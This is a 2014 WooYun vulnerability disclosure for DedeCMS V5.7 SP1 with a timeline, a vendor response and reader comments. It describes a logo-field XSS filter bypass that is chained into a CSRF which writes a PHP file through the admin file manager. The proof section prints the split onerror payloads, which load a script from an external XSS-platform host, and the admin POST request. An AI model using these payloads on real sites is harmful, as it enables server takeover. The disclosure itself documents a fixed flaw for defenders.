当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(81) 关注此漏洞

缺陷编号: WooYun-2014-65561

漏洞标题: DedeCMS-V5.7-UTF8-SP1 csrf getshell 无需会员中心

相关厂商: Dedecms

漏洞作者: 索马里的海贼

提交时间: 2014-06-20 09:29

公开时间: 2014-09-18 09:30

漏洞类型: XSS跨站脚本攻击

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

10人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-20: 细节已通知厂商并且等待厂商处理中
2014-06-23: 厂商已经确认,细节仅向厂商公开
2014-06-26: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-08-17: 细节向核心白帽子及相关领域专家公开
2014-08-27: 细节向普通白帽子公开
2014-09-06: 细节向实习白帽子公开
2014-09-18: 细节向公众公开

简要描述:

最近csrf又火了哈,各种csrf脱裤。dede后台挺方便就直接写getshell了
一直在白盒今天试试黑盒 结果发现了这个问题
不用注册,3条请求getshell
测试版本号 20140612

详细说明:

在黑盒测试友情链接功能的时候发现filter的一个bug

网站logo处提交">_<'&quot;&lt;&gt;发现后台显示logo时居然成功引入了双引号闭合了src属性。

1.jpg





经过多次测试发现 只要单引号后面跟&quot;就能成功闭合双引号

于是提交测试代码

code 区域
'&quot; onerror=alert(1);//



2.jpg



3.jpg



成功弹出了alert

漏洞证明:

先用xss平台创建一个项目,然后自定义代码这里用的pkav的post get模块

post

code 区域
**.**.**.**/dede/file_manage_control.php



data

code 区域
fmdo=edit&backurl=&activepath=&filename=csrf.php&str=%3C%3Fphp+phpinfo%28%29%3B%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++



因为此处字符长度有限制所以将payload拆分为3段 分别提交

code 区域
'&quot; onerror=s.src='http://xss平台/KCfTiA';//



code 区域
'&quot; onerror=body.appendChild(s);//



code 区域
'&quot; onerror=s=createElement('script');//



注意显示的顺序与提交的顺序是相反的 所以要把payload顺序倒过来



提交完后访问后台友情链接模块

4.jpg



可以看到访问了js 然后访问了file_manage_control.php

文件管理可以看到shell已经躺在目录里了

5.jpg

修复方案:

xss 过滤器

版权声明:转载请注明来源 索马里的海贼@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-06-23 18:22

厂商回复:

已经修复,感谢提交。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2014-06-20 09:31 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    csrf的奥秘不在于技术 而在于交互 discuz天生就是交互 dedecms就呵呵了

  2. 2014-06-20 09:38 | 小葵 ( 实习白帽子 | Rank:84 漏洞数:11 | 我们是害虫,我们是害虫!)
    0

    呵呵,如果管理员一年不上呢?

  3. 2014-06-20 09:54 | quanxian ( 实习白帽子 | Rank:32 漏洞数:2 | This is QuanXian.)
    0

    @小葵 正解。。X母校网站,几个月过去了,文章一直没有审核。。

  4. 2014-06-20 10:14 | mu0u ( 路人 | Rank:2 漏洞数:1 | 先做人,后做事。)
    0

    @小葵 那种站应该也没什么价值吧。

  5. 2014-06-20 11:20 | 微尘 ( 普通白帽子 | Rank:226 漏洞数:76 )
    1

    三条请求。那不跟以前鬼哥放出来的那个差不多?坐等公布。

  6. 2014-06-20 14:47 | p4ssw0rd ( 普通白帽子 | Rank:306 漏洞数:92 | 不作死就不会死)
    0

    mark

  7. 2014-06-20 16:00 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)
    0

    关注!!

  8. 2014-06-23 20:48 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )
    1

    - -应该还是审核文章那块。价值不是很大

  9. 2014-06-23 22:22 | 索马里的海贼 ( 普通白帽子 | Rank:264 漏洞数:25 | http://tieba.baidu.com/f?kw=WOW)
    0

    @大白菜 不需要会员中心哪来的审核文章啊

  10. 2014-06-23 22:37 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )
    0

    @索马里的海贼 - -我看错了,楼上说的文章审核那块。。我以为是那块呢, 友情连接申请那块吧? 别的地方基本少了

  11. 2014-06-26 18:28 | 微尘 ( 普通白帽子 | Rank:226 漏洞数:76 )
    0

    @索马里的海贼 直接公布吧。等不下去了。

  12. 2014-08-05 12:16 | 网络流氓 ( 路人 | Rank:29 漏洞数:3 | 欢迎热爱网络安全的朋友技术交流QQ:1020471...)
    0

    我以为直接前台直接打呢。。。。。。。

  13. 2014-09-09 19:35 | pigzhu ( 路人 | Rank:4 漏洞数:4 | 网络共享!)
    0

    后台找不到呢。。。

  14. 2014-09-20 21:13 | Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)
    0

    马克。

  15. 2015-10-05 18:09 | zhxs ( 实习白帽子 | Rank:69 漏洞数:26 | 不是你不行、只是路不平ฏ๎๎๎๎๎๎๎๎...)
    0

    一直没看明白 pkav的post get模块 是那个呀 求详情 跪谢~~

登录后才能发表评论,请先 登录